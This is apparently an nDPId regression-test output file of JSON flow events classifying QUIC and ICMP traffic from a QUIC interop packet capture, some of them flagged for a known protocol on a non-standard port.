+00824{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":120000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00652{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":120000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00862{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00839{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00832{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00829{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00711{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00860{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00874{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":180000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00724{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00690{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":120000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}}
+00736{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00865{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":180000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":120000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00856{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434750,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"71.202.41.169","src_port":37661,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434806,"flow_last_seen":1603816435089,"flow_idle_time":120000,"flow_min_l4_payload_len":63,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1238,"flow_avg_l4_payload_len":309,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"202.238.220.92","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00874{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434678,"flow_last_seen":1603816434822,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":38394,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434743,"flow_last_seen":1603816434743,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":48644,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434524,"flow_last_seen":1603816444507,"flow_idle_time":180000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":46334,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}}
+00856{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434643,"flow_last_seen":1603816434680,"flow_idle_time":180000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":49270,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434656,"flow_last_seen":1603816435111,"flow_idle_time":180000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":45855,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
+00860{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434729,"flow_last_seen":1603816444586,"flow_idle_time":180000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":41857,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}}
